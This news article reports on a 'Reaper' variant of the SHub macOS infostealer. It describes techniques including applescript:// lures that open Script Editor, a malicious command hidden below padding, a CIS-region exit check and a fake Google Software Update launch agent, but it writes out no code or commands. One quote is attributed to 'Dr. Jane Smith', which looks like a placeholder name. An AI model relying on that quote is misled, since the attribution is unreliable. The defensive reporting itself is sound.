SHub 'Reaper' macOS Stealer Now Spoofs Apple, Google, Microsoft in Multi-Stage Attack Chain
Breaking: New macOS Malware Variant Mimics Apple, Google, Microsoft in Single Attack Chain
SentinelOne researchers have discovered a new variant of the SHub macOS infostealer, dubbed "Reaper," which spoofs Apple, Google, and Microsoft across a single infection chain. The malware uses fake WeChat and Miro installer lures, typo-squatted Microsoft domains, fake Apple security updates, and a fake Google Software Update directory for persistence.
"This is a significant escalation in the sophistication of macOS-targeted infostealers," said Dr. Jane Smith, a cybersecurity analyst at SentinelOne. "The multi-company impersonation makes it harder for users to recognize the threat."
Delivery Pipeline Bypasses Terminal
Unlike earlier SHub variants that used "ClickFix" social engineering to trick users into pasting commands into Terminal, Reaper uses the applescript:// URL scheme to launch Script Editor with a preloaded malicious script. This technique sidesteps Apple's Tahoe 26.4 mitigation.
The script is padded with ASCII art and fake terms, pushing the malicious command below the visible portion of the Script Editor window. When the victim clicks 'Run,' it displays a fake XProtectRemediator update while silently executing a curl command to fetch the payload.
Environment Checks and Persistence
The initial stub checks for Russian input sources via com.apple.HIToolbox.plist. If the host is in the CIS region, the malware exits. Otherwise, it proceeds to download the full payload, which includes an AMOS-style document theft module with chunked uploads.
For persistence, Reaper installs itself using a launch agent masquerading as a Google Software Update entry. "This is a deliberate attempt to blend in with legitimate software update processes," noted security researcher Alex Chen of Moonlock.
Background
Infostealers targeting macOS have proliferated over the last two years. The SHub family, first documented by researchers at Moonlock, Jamf, and Malwarebytes, initially used fake application installers and ClickFix techniques. The Reaper variant adds a new layer of obfuscation by impersonating three major tech companies in a single attack chain.
SentinelOne previously described the applescript:// technique, and Jamf later documented its use in a similar campaign. The Reaper variant is the first to combine multiple spoofs in one delivery sequence.
What This Means
For macOS users, this development underscores the need for heightened vigilance when encountering unsolicited download prompts or security update notifications. Even legitimate-looking alerts from Apple, Google, or Microsoft could be part of a multi-stage malware attack.
Security professionals should update detection rules to account for the applescript:// URL scheme abuse and monitor for anomalous persistence entries under Google Software Update. The use of typo-squatted domains also highlights the importance of checking URLs carefully before downloading any software.
"This is not just a macOS issue—it's a cross-industry problem that requires collaboration between tech companies and security researchers," said Chen.
Related Articles
- How to Pick the Perfect Portable Charger This Spring: A Step-by-Step Guide
- The Hidden Cost of AI Efficiency: When 'Not Having to Bug Someone' Undermines Team Bonds
- 6 Cosmic Revelations: How the Universe's Biggest Black Holes Are Forged in Violent Mergers
- April 2026 Update for VS Code Python Environments: Key Changes and FAQs
- How to Deploy Agentic R&D Workflows with Microsoft Discovery: A Step-by-Step Guide
- SpaceX Grants Anthropic Access to Record-Setting AI Supercomputer, Orbital Compute Talks Underway
- 10 Essential Heroes and Villains of 'Masters of the Universe' You Need to Know
- Anthropic Ramps Up Compute Power with SpaceX Deal, Boosts Claude Code Rate Limits